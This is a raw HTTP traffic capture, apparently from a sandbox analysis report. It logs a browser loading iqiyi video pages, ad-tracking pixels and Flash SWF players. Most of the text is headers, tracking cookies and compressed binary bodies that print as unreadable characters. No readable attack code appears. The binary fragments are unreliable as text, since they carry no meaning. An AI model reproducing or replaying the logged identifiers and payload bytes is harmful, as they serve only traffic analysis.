0000017000000000164001fffe1001d6764001fac56240e0107e59a808080a00000030
02000000651e306315001000568e89af2c00000003d</video_tag>.  <au
dio_tag>0800000900000000000000af00139056e5a5480000000014</audio_
tag>.  <keyframesequences>.   <keyframes>.    <times
>.     <value id="0">0.000</value>.     <value id="1
">0.000</value>.     <value id="2">2.000</value>.
     <value id="3">4.000</value>.     <value id="4">
6.000</value>.     <value id="5">7.040</value>.     
<value id="6">9.040</value>.     <value id="7">11.04
0</value>.     <value id="8">13.040</value>.     <
;value id="9">15.040</value>.     <value id="10">17.040
</value>.     <value id="11">19.040</value>.     <
;value id="12">20.560</value>.     <value id="13">22.32
0</value>.     <value id="14">24.320</value>.     &l
t;value id="15">26.240</value>.     <value id="16">28.2
40</value>.     <value id="17">30.240</value>.     &
lt;value id="18">32.240</value>.     <value id="19"><<< skipped >>>

GET /pixel;r=1302890811;a=p-pV8razYeGyZwj;fpan=1;fpa=P0-1340228538-1484906118834;ns=1;ce=1;cm=;je=1;sr=1366x768x24;enc=n;dst=1;et=1484906118834;tzo=-120;ref=http://coinsns.com/index.php?s=/lottery/index/index.html;url=http://blockadz.com/ads/show/show.php?a=MNKKAJHPC2F4X&b=8KUVPZMBBAG6V;ogl= HTTP/1.1

Accept: */*

Referer: hXXp://blockadz.com/ads/show/show.php?a=MNKKAJHPC2F4X&b=8KUVPZMBBAG6V

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: pixel.quantserve.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Connection: close

Content-Type: image/gif

Set-Cookie: mc=5881de87-03611-75ece-ce886; expires=Tue, 20-Feb-2018 09:55:19 GMT; path=/; domain=.quantserve.com

P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"

Cache-Control: private, no-cache, no-store, proxy-revalidate

Pragma: no-cache

Expires: Fri, 04 Aug 1978 12:00:00 GMT

Content-Length: 35

Date: Fri, 20 Jan 2017 09:55:19 GMT

Server: QS

GIF89a.......,.................D..;..

GET /static/ab77b6ea7f3fbf79.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: s2.qhimg.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: application/x-javascript

Content-Length: 353

Connection: keep-alive

Server: nginx

Date: Thu, 22 Sep 2016 17:59:56 GMT

Last-Modified: Sat, 06 Aug 2016 04:17:30 GMT

Expires: Thu, 31 Dec 2037 23:55:55 GMT

Cache-Control: max-age=315360000

Content-Encoding: gzip

X-QSTATIC-HIT: 1

Access-Control-Allow-Origin: *

Accept-Ranges: bytes

Vary: Accept-Encoding

Age: 10338913

X-Cache: Hit from cloudfront

Via: 1.1 2db316290386960b489a2a16c0a63643.cloudfront.net (CloudFront)

X-Amz-Cf-Id: A9i_1NdvF8gwVl1h2istV8Oj8B5XD3N_iB_zy7oAx1zrGWEzczLeog==
.....d.W..UP.N.0....C..]..i..h..a..H\h ..i.h.*N7Q..'a....~z~~...M.4...
....0...9.A%...V5.....iG..2.v.."4.B....y.5`I.@.HA,W..A.IB5.F...c......
.hf....i.....cX7..|..p......<...~....... ..!.....V...g;...q|e.S...q
....=3r.[..29...?.."....j.*...4.V7Q...j..q.U..S.}...$B.&...2........2.
.#@S)...6.lU.....h=.ND.2....e......z.^...Q...5....S...'..g...#%.t4..O.
.-....HTTP/1.1 200 OK..Content-Type: application/x-javascript..Content
-Length: 353..Connection: keep-alive..Server: nginx..Date: Thu, 22 Sep
 2016 17:59:56 GMT..Last-Modified: Sat, 06 Aug 2016 04:17:30 GMT..Expi
res: Thu, 31 Dec 2037 23:55:55 GMT..Cache-Control: max-age=315360000..
Content-Encoding: gzip..X-QSTATIC-HIT: 1..Access-Control-Allow-Origin:
 *..Accept-Ranges: bytes..Vary: Accept-Encoding..Age: 10338913..X-Cach
e: Hit from cloudfront..Via: 1.1 2db316290386960b489a2a16c0a63643.clou
dfront.net (CloudFront)..X-Amz-Cf-Id: A9i_1NdvF8gwVl1h2istV8Oj8B5XD3N_
iB_zy7oAx1zrGWEzczLeog==.......d.W..UP.N.0....C..]..i..h..a..H\h ..i.h
.*N7Q..'a....~z~~...M.4.......0...9.A%...V5.....iG..2.v.."4.B....y.5`I
.@.HA,W..A.IB5.F...c.......hf....i.....cX7..|..p......<...~....... 
..!.....V...g;...q|e.S...q....=3r.[..29...?.."....j.*...4.V7Q...j..q.U
..S.}...$B.&...2........2..#@S)...6.lU.....h=.ND.2....e......z.^...Q..
.5....S...'..g...#%.t4..O..-......<<< skipped >>>

GET /beacon.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: b.scorecardresearch.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: application/x-javascript

Vary: Accept-Encoding

Content-Encoding: gzip

Expires: Fri, 03 Feb 2017 09:55:10 GMT

Date: Fri, 20 Jan 2017 09:55:10 GMT

Content-Length: 901

Connection: keep-alive

Cache-Control: private, no-transform, max-age=1209600
..........mT.k.6..W.e.....t.........F..}.&(..k.%#.. u..];N[x.`,...9.9*
;..m.. .].0...t3C...9.N.....].L@M....W ....@.B}.,.;...}p...%A..!T.%]/.
.`.9....`.....<b..z.E....!Q&.....po........e.R]Fzk...x%J..#-. ....!
...6Tle..o.......1;7a.....S.w..d4f.,jc.mB.T.......,..z..!..1..~.1.J:..
...csI.J.....~...8:.1.`....{uI ..<?./.j...b..Z.......u.}{.k,.m.;U*.
.....]9...R%..L.&5PXb...Hj....J...ES.>s............@..F...D-.......
......G....*[.....~.q..5......k..>.....X.....".....;.\..0.....^..R.
P1...^t..q$k.|.....c7...d.Z..V.:.^j....Gb...`...W........#.....Y?.....
.yX.....6C..Yb..].....l=.f........A..9L...ab.f.....[.eT.....q... .k..4
...t5P.....0*..e.....T..I%.........eR..}.1..eB&...;.......[G.3.......s
.......bL.~0....cXX..m..l...uv)'.q..D...B.....{.].WO...zp....C.U..a...
....{.J2j ..p. .....f....5....w...?V...':?1..../..J..?.........%.N.0av
.sH..K...|{&.i...=.>..qmr........b.;..;(......5...R@ocv...[..)...1.
.p....HTTP/1.1 200 OK..Content-Type: application/x-javascript..Vary: A
ccept-Encoding..Content-Encoding: gzip..Expires: Fri, 03 Feb 2017 09:5
5:10 GMT..Date: Fri, 20 Jan 2017 09:55:10 GMT..Content-Length: 901..Co
nnection: keep-alive..Cache-Control: private, no-transform, max-age=12
09600............mT.k.6..W.e.....t.........F..}.&(..k.%#.. u..];N[x.`,
...9.9*;..m.. .].0...t3C...9.N.....].L@M....W ....@.B}.,.;...}p...%A..
!T.%]/..`.9....`.....<b..z.E....!Q&.....po........e.R]Fzk...x%J..#-
. ....!...6Tle..o.......1;7a.....S.w..d4f.,jc.mB.T.......,..z..!..1..~
.1.J:.....csI.J.....~...8:.1.`....{uI ..<?./.j...b..Z.......u.}<<< skipped >>>

GET /b?c1=2&c2=7290408&ns__t=1484906111082&ns_c=windows-1252&ns_if=1&cv=3.1&c8=ã€Šæ˜Žæ˜Ÿå¿—æ„¿ã€‹J-starç»„åˆç»ƒä¹ å®¤æ—¥å¸¸-ç”µè§†å‰§-é«˜æ¸…è§†é¢‘â€“çˆ±å¥‡è‰º&c7=http://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&c9= HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: b.scorecardresearch.com

Connection: Keep-Alive


HTTP/1.1 302 Moved Temporarily

Content-Length: 0

Location: hXXp://b.scorecardresearch.com/b2?c1=2&c2=7290408&ns__t=1484906111082&ns_c=windows-1252&ns_if=1&cv=3.1&c8=ã€Šæ˜Žæ˜Ÿå¿—æ„¿ã€‹J-starç»„åˆç»ƒä¹ å®¤æ—¥å¸¸-ç”µè§†å‰§-é«˜æ¸…è§†é¢‘â€“çˆ±å¥‡è‰º&c7=http://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&c9=

Date: Fri, 20 Jan 2017 09:55:11 GMT

Connection: keep-alive

Set-Cookie: UID=18E21721223838a2f8a33401484906111; expires=Thu, 10-Jan-2019 09:55:11 GMT; path=/; domain=.scorecardresearch.com

Set-Cookie: UIDR=1484906111; expires=Thu, 10-Jan-2019 09:55:11 GMT; path=/; domain=.scorecardresearch.com

P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"

Pragma: no-cache

Expires: Mon, 01 Jan 1990 00:00:00 GMT

Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
....


GET /b2?c1=2&c2=7290408&ns__t=1484906111082&ns_c=windows-1252&ns_if=1&cv=3.1&c8=ã€Šæ˜Žæ˜Ÿå¿—æ„¿ã€‹J-starç»„åˆç»ƒä¹ å®¤æ—¥å¸¸-ç”µè§†å‰§-é«˜æ¸…è§†é¢‘â€“çˆ±å¥‡è‰º&c7=http://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&c9= HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: b.scorecardresearch.com

Connection: Keep-Alive

Cookie: UID=18E21721223838a2f8a33401484906111; UIDR=1484906111


HTTP/1.1 204 No Content

Content-Length: 0

Date: Fri, 20 Jan 2017 09:55:11 GMT

Connection: keep-alive

Pragma: no-cache

Expires: Mon, 01 Jan 1990 00:00:00 GMT

Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
HTTP/1.1 204 No Content..Content-Length: 0..Date: Fri, 20 Jan 2017 09:
55:11 GMT..Connection: keep-alive..Pragma: no-cache..Expires: Mon, 01 
Jan 1990 00:00:00 GMT..Cache-Control: private, no-cache, no-cache=Set-
Cookie, no-store, proxy-revalidate......


GET /b?c1=1&c2=7290408&c3=10&c4=11&c5=&c6=&c7=http://VVV.iqiyi.com/v_19rra3jt70.html&c8=&c9=&c10=&c11=5088e17771f6d54476f95dc61f9e80b4 HTTP/1.1

Accept: */*

Accept-Language: en-US

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: b.scorecardresearch.com

Connection: Keep-Alive

Cookie: UID=18E21721223838a2f8a33401484906111; UIDR=1484906111


HTTP/1.1 204 No Content

Content-Length: 0

Date: Fri, 20 Jan 2017 09:55:13 GMT

Connection: keep-alive

Pragma: no-cache

Expires: Mon, 01 Jan 1990 00:00:00 GMT

Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate

HTTP/1.1 204 No Content..Content-Length: 0..Date: Fri, 20 Jan 2017 09:
55:13 GMT..Connection: keep-alive..Pragma: no-cache..Expires: Mon, 01 
Jan 1990 00:00:00 GMT..Cache-Control: private, no-cache, no-cache=Set-
Cookie, no-store, proxy-revalidate..

GET /ads?spot_id=2007013&rand=1853651284&impid=52_1484906106682039_8221&uuid=b3da0bc7-5356-4cf4-8cd7-941025e2cf15 HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Referer: hXXp://ads.trafficjunky.net/ads?zone_id=1344041&ref=freemomboy.com&pid=60e5644c-fd9a-44a6-a46b-49c04e3effcd&ts=1484906106

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; chromeframe/22.0.1229.94; .NET CLR 2.0.50727)

Host: ads2.contentabc.com

Connection: Keep-Alive

Cookie: adtools_fc=siteAllocID_266580_expires_1484906106|


HTTP/1.1 200 OK

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Date: Fri, 20 Jan 2017 04:55:06 GMT

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: GET,POST

Access-Control-Allow-Headers: Content-Type

Access-Control-Max-Age: 86400

Cache-Control: private, no-cache, no-cache, proxy-revalidate

Set-Cookie: adtools_fc=siteAllocID_266580_expires_1484906106|; expires=Sun Feb 19 04:55:06 201

Server: Logger/0.1

Content-Encoding: gzip
30f.............T.n.6...VE...-...-[)..l.`s)..>..HK.).KQ....Pq...R`.
A gFgngf......G.k.......lZ.(..j;...w..2......k6.......V...^.y.....9..5
j...*.52.1...Ek@a..*I...N.q.I G..6@ZURT.2..bzXh../..s..C.....AT/.:....
.........<....d......,.xf...bf. ...W.xy.0V.2..L..;.J>^......`...
J#......-.$U>)8..d.>.|..*..q... .S.......E.......A.3n...6~....O.
=.... *.?..b.I.EO.m.U............Vp.d..'..==..g.j[SE..Pr..$...........
hM.........q.. >~.x..Tp.~.0i..G....q.".,...'m....o....}=q..{.|.....
5^fI...4...p...Dk...&q.LWQ.Gy..Q."K...5.r>...].@S.._..z.. .k..D.9.Q
.E....l....'.*...:q.kT....5Z(..........5.1...{..7......`8m......p7._.@
a~..3.@.....U.x.u.....b....a...'VHY.2C .3.M....Fj...Z/jq....~.`BTg...5
b...-.P..l...:B.B.'.1..L..h.).!.Z.(E....8.'....!..K..9........0.I0....
P...e....6..S.7.T.XpSQB.....k._.y.r&.....0..

GET /vpb.gif?flag=rptusr&newusr=1&suid=5088e17771f6d54476f95dc61f9e80b4&tn=0.5403782017529011 HTTP/1.1

Accept: */*

Accept-Language: en-US

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: msg.iqiyi.com

Connection: Keep-Alive

Cookie: Hm_lvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; Hm_lpvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; QC007=DIRECT; QC006=o5rodndzg8of8s4mwfefai5c; QC008=1484906110.1484906110.1484906110.1; QC005=5088e17771f6d54476f95dc61f9e80b4; QC010=137349363


HTTP/1.1 200 OK

Server: nginx/1.8.0

Date: Fri, 20 Jan 2017 09:55:14 GMT

Content-Type: image/gif

Content-Length: 0

Connection: keep-alive

HTTP/1.1 200 OK..Server: nginx/1.8.0..Date: Fri, 20 Jan 2017 09:55:14 
GMT..Content-Type: image/gif..Content-Length: 0..Connection: keep-aliv
e..

GET /jzt/libs/behavior/v2/behavior.js HTTP/1.1

Accept: */*

Referer: hXXp://x.jd.com/exsites?spread_type=2&ad_ids=198:5&location_info=0&callback=getjjsku_callback

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: static-alias-1.360buyimg.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Encoding: gzip

Accept-Ranges: bytes

access-control-allow-origin: *

Cache-Control: max-age=3600

Content-Type: application/javascript

Date: Fri, 20 Jan 2017 09:55:11 GMT

Expires: Fri, 20 Jan 2017 10:47:40 GMT

Last-Modified: Fri, 02 Dec 2016 11:51:44 GMT

Proxy-Connection: keep-alive

Server: ECS (arn/459A)

Vary: Accept-Encoding

Via: http/1.1 HK-1-JCS-67 ( [cRs f ])

X-Cache: HIT

Content-Length: 1673
...........V.r.....SH.V.H0E..tE.....6...d7.... x.x...R$...vz..N....t./
....B.P"-.r.i{a..~......;.....[.&....1.M.....\Z...X.2./2!'Y...S ...Xb.
q..=..M&...P.i<...{B.O..@..[...".b.........r..a........#E.^v.\:S-.Y
.... ...e.r?.UN...$....r.....U.l..C.u.g.I..fi..=.S.tj3.L~..d..X...a.R.
...G.B.N..%s.......eqr.#ts....9>>(W.c..3a..p..........KNN......|
|.[..bz;...B-..E........>.V....|..PL..mXZ.;b...Q&.H.q4.D..0].zssc..
..35.r.....bw.(...R.tS..=S@....[..mN~1#.L..Y.{.8".:Q...V.U<...d.6..
...S.cq.... .'.. .....:.i...a....8.....7/..(Mb.8.i..2...b....=.....M.i
...@a.!b.t...0....jU].G......I....m......h..>.:..ceN.Ge......4. 5.:
.k.....`V..,.PGm.".E..cc.~...z....Af...<_W'.5......&[f....i...HaN..
.u.M.X......2>tF.9n...K.jm....im.{......[....%..QU.U..a1..y...u....
q...rI.1....V...Q..a)..<1GA.T.7......p............UU..b....r...XLJY
2.Z:.}<..:.6..b.M...\..UR...)...K.|D..S>......V....y*W|e .@"...A
K..k7I.cx$@..@.....?,....4.j..r..vRvE...TY..........4.A...\._.~,h...1.
H....Mw......PD....K.....i5.t.. ^..^[...{..";.rU.....&?.M..W...G.E..5.
.6........Y.`......MdS.V.h...7.....<....55......h..7..nD.}x.'.Y....
q...y....,....l...;.....Q......Q......L.\f. ZT..x-.*r.9.g...W..=....}.
{..}E~..j`.d....v.........p;l{...........Q.m0..Jo..w5...w.J=d...pQ2|.x
.3tzv~q..../...._...7.}...w.~....,..~<?...Q....\N....'......=.....R
.5-....9u...c..q}M.;.YS/[/..N._v......$pw..i~.K:c......D......s..Ob..Z
................. ....2...}.Y"...t.V=r9..~.P.Ku....D.|R....%.n......K.
>......K..b..]...T?9._u....lW.l...f...tW.F.%......8ei..\.Xd.m..<<< skipped >>>

GET /common/flashplayer/20170119/1050f98c2359.swf HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: VVV.iqiyi.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash

Accept-Ranges: bytes

ETag: "798541376"

Last-Modified: Thu, 19 Jan 2017 02:50:35 GMT

Content-Length: 568003

Server: Apache 1.3.29

Cache-Control: max-age=522746

Expires: Thu, 26 Jan 2017 11:07:34 GMT

Date: Fri, 20 Jan 2017 09:55:08 GMT

Connection: keep-alive
CWS.....x....8.].0z.-D.$L..........c0.`f.....'.A..-D..GHD. Q...!.8. ..
...}....?.?.{.e....{......{./.7..dy....(S2...@.....({.)CeU... .-.>.
p9a0.RBB>>>.>...(G!aIII.."B"".`........@...d..(..0....pGB.
.P;w/.....W{.O..^(....0!. .........AF.0).w...#...pE..XvB..h'w.........
E;I....m.A`\....P........(.j~P....../9e..r.[.B.Z..u......<..\.h'8.G
?F....(.....i..._...`(8....6.Q.....t..:.e.H[............&..........?..
[*-.. .J@.........%...}K.c...@.;>@C.`.x3.....]...P?8..#B..8.9.v...p
.QQ.}l.w...B.u.... 'F.' .)..e.l..x.XX.E4|#..'../x......q...<.|.4..C
..Y.(Si..rZd.G.KxZ....K..B(w.%..q\..P...... .v.N.........8E{.@^"......
*..W4R..K..........(!;.R.....>.v.....?.vVXD...yq.I`.....*.@..=....@
t`........Sa..1....|..G..a.K]...?......>.!.qb...d...T.4.t....t&...X
X!....pprq.......a..m...xeq../..s_W/Z..JnPnX..!.0ls..v!....M..`.3O..0.
\lF}....'.........3.......J..}..;..@a.Fs...z<l...@..[...n.c.]..-.$o
;.....`...<<4....$N3.~u...&.02F.......{........Zr....xDj..3p.b\H
xq. u$X.l.#.....>#..8...:Wuc....'%5..t.z..6....n.b.a..4..AD.]Q{..q.
...w..6.....].......,.#..."...=W.,.>......G=~.-....N...w..c..x].O.R
.....g..*....gbFZf.^......2z..B.VX9?m...6.x.^.EIG4Xe.7@_....{.......k.
OS.o.>;A.b{K..=....EF...z.l.qa.k.4S6$...H.k...n{Yl..<.7.-..=.[.j
..../%....<...sa.......![..~l..*fV..z*s..mJ....;,...&.o...I[. :)...
..7...w.>{>W.E.^..../Wf%o....=....>....r.H^....v2....]".l..Wg
*..r4."_p.>o..8....o.w.^......m.n..V.,?:#(n...j|I.3g._[.B...%.W....
....u..T<.............G..c..K..gv..Nz.A.m0y....w.dGV.....TV.s..<<< skipped >>>

GET /common/flashplayer/20161122/182321793893.swf HTTP/1.1

Accept: */*

Accept-Language: en-US

Referer: hXXp://VVV.iqiyi.com/common/flashplayer/20170119/1050f98c2359.swf

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: VVV.iqiyi.com

Connection: Keep-Alive

Cookie: Hm_lvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; Hm_lpvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; QC007=DIRECT; QC006=o5rodndzg8of8s4mwfefai5c; QC008=1484906110.1484906110.1484906110.1


HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash

Accept-Ranges: bytes

ETag: "1628067405"

Last-Modified: Tue, 22 Nov 2016 10:23:51 GMT

Content-Length: 11543

Server: Apache 1.3.29

Cache-Control: max-age=447124

Expires: Wed, 25 Jan 2017 14:07:15 GMT

Date: Fri, 20 Jan 2017 09:55:11 GMT

Connection: keep-alive
CWS..B..x....<.........F.-..($."[.;EYK....e.TcW..D..IHHR.lem.~.R.T.
....3=C.........^?..y.....3..9.......r....0......./g.......ie`D.......
...^!!.........*..A...444.......P...}.!.......:d....`. ......2C.......
r..n#..Y... .....Pp..S.p.TTR.*2...i..y..........2Z..|]....A.....P...d}
kUm..m..z...?.e..:y...2.F...J.TY/GU..R.\.l....#...5....V.\....n.....}y
.........-.....z...twc-g`h./....)z.z.y...CK../....g@..k..k`.... .C...`
...=..a......V\l....43s...!..)"..C.<<.y.`.}...V....An.Ps.....\..
?8......@........z.jT.u#.u.J.*JJ...uu... .....7P....K.....B....7..CoK.
Ez......zL.A....*............X.......n........A.......Y*.2........?...
].....L...Ez..w.......`....?....O.........C.Q......*.J.ld`p.u........a
....@.........86,...............-....!..'..bd..r<......\..D><
..Q.r.?F'(vv.Y..g...#...'#?.......g...s.o..A..h~....p......P..E~Ph....
...j. ....81l.f%..._r..Je]K....=....D.]A...3R*....2.....EP....k....U..
.h...fc_2...._re...eA..lX..eA..0.c.1.1.`#.Q. .$9h.z...s2t.-G.l..(.=.G.
.b..&f....HM.ww....ZlC.q5._..}.$?..1,........*........?.Ul...,.t......
..A...v.EYr......k3.3...nZF.eK7x.uA\R/e...[.#[....kT\5'.B..N.jg.).l...
.GS...>.K._...3=W_....W.wz.......9.o%.z$.}.6[......./.3.#H..W.'q...
W.)..\..(o...r..OyY...^........}....e..qP....Z..)....Bb............(.t
P*.J..W..t....k.w..z\.Y1=..|.5...n{.]l.._%.....~.....iT...%..5.q.Ukj..
........=..:'.....xgF.wm...}...|..;...`..sk...g.,Gal...W...$].j="vf|`y
J..\.nz.....q...`0..{X.dE.....R......w......Ye.~.G.y.w...&....5...j.v.
.......>..d_...,......^(d.'.{.&=........Y{n.&..K..e.P.F........<<< skipped >>>

GET /player/cupid/common/clear.swf?r=xv1v5n HTTP/1.1

Accept: */*

Referer: hXXp://passport.pps.tv/pages/user/proxy.action

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: VVV.iqiyi.com

Connection: Keep-Alive

Cookie: Hm_lvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; Hm_lpvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; QC007=DIRECT; QC006=o5rodndzg8of8s4mwfefai5c; QC008=1484906110.1484906110.1484906110.1


HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash

Accept-Ranges: bytes

ETag: "1695113837"

Last-Modified: Thu, 04 Dec 2014 01:39:56 GMT

Content-Length: 31392

Server: Apache 1.3.29

Cache-Control: max-age=172800

Expires: Sun, 22 Jan 2017 09:55:13 GMT

Date: Fri, 20 Jan 2017 09:55:13 GMT

Connection: keep-alive
CWS.p...x.....\e......s....H.A..H.Crz...r...L....S......\...[@Q..W..{o
.....{...........<gn........3...-..}...}......a...0V)c....a....V...
NQn..m.uxfz...o......7._....u..us....$I...z.=. ...........w.yU..t7...{
..YK....Bo..5.....L..:.U.E.^O..=...w.9dT.....L.;/...n..d......s....k..
.t.=..../.{z...>os1.ik..>l.....WW./.....=oI5S.{]>7.~.3W,...$.
....H....t.{Pw.[..zv.P.....5yG...._q....Ng.,...y...s..WeL{.<.v.s..\
._.9....h..#..y..e?.?..Z.....:T.{.....<....s...B..KCTr...#..|Z.....
.....08o..tF;.2c...?....F2.k....^.......z....^'..h....`.5l...H....~.~.
'........?........_...u...~..F.....r.....e._..wO.y.K~....?.%.o<.)..
..u.......m...|.........Ow...-.q..._..o6...........w....w....-......|.
.#w...o....o.6.....m._x..._w..>1...........7..|.7.?...|....x.O^....
7.>..O}._..v....|.._......'w._..O.o......5...g.j.._....^..?~......]
......;..?.......q_...{......}..7.......;~........R?z..^5.....e..t....
x............?.._.................}.x......?5.{.;.}.....yC/{.K....O..w
.]?..O.....|.......cw.U7....~..........5s.b.r.u.....I.4..:.....lO....9
zzv`s...i,pp..K...O.G.....a>{....1,e.X...F..y.c..k.%.n....#.i....JN
.....:.5w/.d.3.[..dv....a...K.z..B.......v..<....\.9...i..l......%7
....;.t......=.;7..p.........U....;..>..%../...{.........9...<w.
....u..].Svl..jww..h...5......v.34.....Rw...G....G..57..=...F{.....K..
...6M0.......#z4.....\.w1..W.s....-...r..4.z...]...g...%.j...T..5g.x..
...^.[..nK{...iw.,.....j..N.L..8..J....^U1],....s...J?.92Z..=..m.j../.
.D-./....l....y...vw..&.~w.p..-..?=.......vO.......O......q....zak<<< skipped >>>

GET /common/flashplayer/20161122/1823925a82d4.swf HTTP/1.1

Accept: */*

Accept-Language: en-US

Referer: hXXp://VVV.iqiyi.com/common/flashplayer/20170119/1050f98c2359.swf

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: VVV.iqiyi.com

Connection: Keep-Alive

Cookie: Hm_lvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; Hm_lpvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; QC007=DIRECT; QC006=o5rodndzg8of8s4mwfefai5c; QC008=1484906110.1484906110.1484906110.1; QC005=5088e17771f6d54476f95dc61f9e80b4; QC010=137349363; T00404=9b9366963d49845dcaef1cf22d487ad8


HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash

Accept-Ranges: bytes

ETag: "53110445"

Last-Modified: Tue, 22 Nov 2016 10:23:51 GMT

Content-Length: 3584

Server: Apache 1.3.29

Cache-Control: max-age=331224

Expires: Tue, 24 Jan 2017 05:55:38 GMT

Date: Fri, 20 Jan 2017 09:55:14 GMT

Connection: keep-alive
CWS.L&..x..W.T.W.......L............D......P.QI Q.@.......A.........P[
_.3.....z....^.Akg.V...)u.2...=.$Bc.:s.]..Z...9....>{.....fu...@` 3
}z .<7...H6j7&..g......$.Z.VR]mH.H.....b...M..B..H...\.............
....!]WUl,5T.. I.ZS...^..6..Tap.....h.E..b}...1Hd.R..."%..u.j.1_./OIu.
..rMU..2.7....{M9...O.....r-..(K...r./]:.....X.T!...e....$."R..$.N..c.
....5ZM....L..%......,~..$...^[.q./2~.$.%?../.mN..g..B.bWU..6.<.*..
A'..U.k..:D.j.:99I..U...b]fz...KK.I.q...DeLBjb..X.L.!W$. ...E.EB......
.o.....]e..7...m....rc..R......IU*........kjLj."yZlj\jZ.<=...1.....
..:m.Q_...Ac..92. ..*G...M*.LS.4.!&]....S..0uy..#..0uy..o....Hwa....ni
m..C.5.r....Kt.:..U...9'..8i..X..N........C.I\U./~.NS..otL.d.#.cC.....
..p4./.|._....}.....!.....@.6?.}.......x..s..g.R.@..QK..es...n...wV.{.
.....3..;....a...!'8...ba....z....2`}..*.]X...&q.0.O.b|.;rs..t..;....?
|{.f]..../..p...F^.`......#...p.V.....'.v.|....3.'...9.........^..~dN.
.......}.....9.3m.')....L;....D.........>...\.SW.s...8.72;..H......
@...@..?.....f/..i.:;7..#C.....V...)x....}L.......G......s.7..Sq....=.
....)....wp...k.V..... ........a... N/..#R1...^5.T.......\w.o........Z
G..|....<s..[#z....]#3.... ..w.n/..P...)<.qm..NW..55.....0......
tH../l.........^.ZI<.<BoB...{K.....7.f....1|....R.?7ohz...l.-...
